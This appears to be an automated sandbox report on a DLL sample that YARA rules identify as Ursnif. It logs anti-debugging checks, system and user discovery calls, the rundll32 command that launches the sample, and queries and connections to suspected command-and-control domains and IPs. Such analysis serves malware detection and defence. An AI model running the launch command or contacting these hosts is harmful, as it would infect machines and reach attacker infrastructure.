                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: WerFault.exe, 0000000C.00000003.926283769.00000000048B6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWm32\advapi32.dll
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.902665043.0000000004560000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.938125643.0000000005307000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 0000000F.00000003.936044986.0000000005307000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E316CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress,0_2_6E2D1DE5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E32C325 mov eax, dword ptr fs:[00000030h]0_2_6E32C325
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E338861 mov eax, dword ptr fs:[00000030h]0_2_6E338861
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37DFDA mov eax, dword ptr fs:[00000030h]0_2_6E37DFDA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37DEAA mov eax, dword ptr fs:[00000030h]0_2_6E37DEAA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37DBB5 push dword ptr fs:[00000030h]0_2_6E37DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E32C325 mov eax, dword ptr fs:[00000030h]3_2_6E32C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E338861 mov eax, dword ptr fs:[00000030h]3_2_6E338861
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E37DFDA mov eax, dword ptr fs:[00000030h]3_2_6E37DFDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E37DEAA mov eax, dword ptr fs:[00000030h]3_2_6E37DEAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E37DBB5 push dword ptr fs:[00000030h]3_2_6E37DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E316CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E30B316
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E316CB3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E30B316

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.218.66 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.153.146 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.137.210 187Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E330E4C
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E309EB5
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E330429
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E33E448
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6E33EA21
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E33E344
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E33E3AD
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E33E84C
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_6E33E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E330E4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E309EB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E330429
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E33E448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6E33EA21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E33E344
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E33E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6E33E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6E33E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDA82B cpuid 3_2_04CDA82B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6E2D1172
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E32FF15 _free,_free,_free,GetTimeZoneInformation,_free,0_2_6E32FF15
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E2D1825
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDA82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_04CDA82B

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
